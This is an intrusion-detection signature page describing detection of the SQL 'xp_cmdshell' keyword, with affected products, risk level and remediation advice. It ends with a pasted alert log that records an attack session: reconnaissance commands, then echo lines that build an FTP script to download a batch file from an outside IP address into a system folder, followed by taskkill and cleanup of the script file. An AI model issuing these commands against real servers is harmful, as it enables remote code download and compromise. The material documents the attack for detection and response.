SQL keyword "xp_cmdshell" has been detected (SQL_XP_CMDSHELL_Detected)
About this signature or vulnerability
Proventia Desktop, Proventia G-Series, Proventia Network IPS, RealSecure Network Sensor, RealSecure Server Sensor, BlackICE PC Protection, BlackICE Agent for Server, Proventia Server for Windows, BlackICE Server Protection, Proventia M-Series:
This signature detects usage of the SQL keyword "xp_cmdshell". Usage of this SQL command allows direct access to shell programs that could be used further compromise the SQL server and other systems.
Default risk level
Medium
Sensors that have this signature
Proventia Desktop: 8.0.675.1700, Proventia G-Series: XPU 24.31, Proventia Network IPS: XPU 1.70, RealSecure Network Sensor: XPU 24.31, RealSecure Server Sensor: XPU 24.31, BlackICE PC Protection: 3.6cpb, BlackICE Agent for Server: 3.6epb, Proventia Server for Windows: 1.0.914.1700, BlackICE Server Protection: 3.6.cpb, Proventia M-Series: XPU 1.70
Systems affected
AIX: Any version, Mac OS: Any version, Windows 2003: Any version, DG/UX: Any version, Windows: 95, OS/2: Any version, Windows: 98, Windows NT: 4.0, Linux: Any version, IRIX: Any version, BSD: Any version, HP-UX: Any version, Solaris: Any version, SCO Unix: Any version, Windows: 98 Second Edition, Windows 2000: Any version, Tru64 UNIX: Any version, Windows: Me, Windows: XP
Type
Suspicious Activity
Vulnerability description
The SQL keyword "xp_cmdshell" has been detected in an SQL session. This SQL command may be used to run any shell command in the context of the user that invoked the command. Usage of this SQL command may be suspicious.
How to remove this vulnerability
Verify that the usage of the command is authorized, block the connection if it is not authorized.
References
ISS X-Force
SQL keyword "xp_cmdshell" has been detected
http://www.iss.net/security_center/static/25155.php
| 2006-03-29 11:05:57 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "dir c:\\ |
| 2006-03-29 11:05:58 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "dir c:\\ |
| 2006-03-29 11:06:03 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "dir C:\\ /oen |
| 2006-03-29 11:06:03 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "dir C:\\ /oen |
| 2006-03-29 11:08:00 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "dir c:\\ |
| 2006-03-29 11:08:07 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "net start |
| 2006-03-29 11:08:17 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo open 196.35.70.85 1050 >>c:\\sql.txt |
| 2006-03-29 11:08:18 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo user bot files >>c:\\sql.txt |
| 2006-03-29 11:08:19 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo binary >>c:\\sql.txt |
| 2006-03-29 11:08:20 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo get start.bat %SYSTEMROOT%\\system32\\spool\\printers\\start.bat >>c:\\sql.txt |
| 2006-03-29 11:08:21 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo quit >>c:\\sql.txt |
| 2006-03-29 11:08:22 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "ftp -n -v -s:c:\\sql.txt |
| 2006-03-29 11:11:55 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "dir c:\\kill* /s |
| 2006-03-29 11:12:07 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "taskkill |
| 2006-03-29 11:12:15 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo. >c:\\sql.txt |
| 2006-03-29 11:12:16 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo. >c:\\sql.txt |
| 2006-03-29 11:12:17 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo. >c:\\sql.txt |
| 2006-03-29 11:12:17 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "echo. >c:\\sql.txt |
| 2006-03-29 11:12:22 JST | SQL_XP_CMDSHELL_Detected | xp_cmdshell "type c:\\sql.txt |